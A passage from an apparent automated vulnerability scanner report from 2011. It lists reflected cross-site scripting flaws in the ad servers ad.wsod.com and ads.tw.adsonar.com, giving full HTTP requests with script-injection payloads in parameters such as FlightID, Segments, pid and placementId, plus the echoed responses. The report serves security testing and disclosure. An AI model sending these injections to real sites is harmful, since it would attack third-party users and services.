wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313434015**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790af749</script><script>alert(1)</script>3d1b80b715e&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46
...[SNIP]...

1.16. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [FlightID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e665d</script><script>alert(1)</script>97a79cce510 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569e665d</script><script>alert(1)</script>97a79cce510&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:46:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3023

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313434014**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569e665d</script><script>alert(1)</script>97a79cce510&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45
...[SNIP]...

1.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [Redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the Redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6cff</script><script>alert(1)</script>23a246c645 was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=b6cff</script><script>alert(1)</script>23a246c645 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:47:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3021

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=b6cff</script><script>alert(1)</script>23a246c645">
...[SNIP]...

1.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [Segments parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the Segments request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da770</script><script>alert(1)</script>908b5162157 was submitted in the Segments parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014da770</script><script>alert(1)</script>908b5162157&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:46:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3023

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014da770</script><script>alert(1)</script>908b5162157&Values=1589&Redirect=">
...[SNIP]...

1.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fcd0</script><script>alert(1)</script>0adc5b924c0 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=52045fcd0</script><script>alert(1)</script>0adc5b924c0&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:46:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3023

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313434018**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=52045fcd0</script><script>alert(1)</script>0adc5b924c0&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,4739
...[SNIP]...

1.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [Values parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the Values request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36527</script><script>alert(1)</script>47910264d8d was submitted in the Values parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=158936527</script><script>alert(1)</script>47910264d8d&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:47:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3023

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=158936527</script><script>alert(1)</script>47910264d8d&Redirect=">
...[SNIP]...

1.21. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbc1e</script><script>alert(1)</script>a14dae43ccf was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=clickfbc1e</script><script>alert(1)</script>a14dae43ccf&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:46:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3023

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
pt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313434012**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=clickfbc1e</script><script>alert(1)</script>a14dae43ccf&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,3530
...[SNIP]...

1.22. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e778</script><script>alert(1)</script>3423c7cdc8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=&5e778</script><script>alert(1)</script>3423c7cdc8e=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:47:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 3029

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
8619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=&5e778</script><script>alert(1)</script>3423c7cdc8e=1">
...[SNIP]...

1.23. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload e993b<script>alert(1)</script>ef71ec02685 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1290411&placementId=1508451&pid=754773e993b<script>alert(1)</script>ef71ec02685&ps=-1&zw=475&zh=260&url=http%3A//money.cnn.com/2011/08/15/technology/google_motorola/index.htm%3Fhpt%3Dhp_t2&v=5&dct=Google%20to%20buy%20Motorola%20Mobility%20for%20%2412.5%20billion%20-%20Aug.%2015%2C%202011&ref=http%3A//www.cnn.com/ HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TData=_Mon%2C%2008%20Aug%202011%2001%3A36%3A19%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:28 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2509


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "754773e993b<script>alert(1)</script>ef71ec02685"

   
                                                           </head>
...[SNIP]...

1.24. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 5c8ab--><script>alert(1)</script>09947fcc484 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1290411&placementId=15084515c8ab--><script>alert(1)</script>09947fcc484&pid=754773&ps=-1&zw=475&zh=260&url=http%3A//money.cnn.com/2011/08/15/technology/google_motorola/index.htm%3Fhpt%3Dhp_t2&v=5&dct=Google%20to%20buy%20Motorola%20Mobility%20for%20%2412.5%20billion%20-%20Aug.%2015%2C%202011&ref=http%3A//www.cnn.com/ HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TData=_Mon%2C%2008%20Aug%202011%2001%3A36%3A19%20GMT

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:26 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 3324
Content-Type: text/plain


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15084515c8ab--><script>alert(1)</script>09947fcc484" -->
...[SNIP]...

1.25. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload f5ed1--><script>alert(1)</script>0d8bde65243 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1290411&placementId=1508451&pid=754773&ps=-1f5ed1--><script>alert(1)</script>0d8bde65243&zw=475&zh=260&url=http%3A//money.cnn.com/2011/08/15/technology/google_motorola/index.htm%3Fhpt%3Dhp_t2&v=5&dct=Google%20to%20buy%20Motorola%20Mobility%20for%20%2412.5%20billion%20-%20Aug.%2015%2C%202011&ref=http%3A//www.cnn.com/ HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
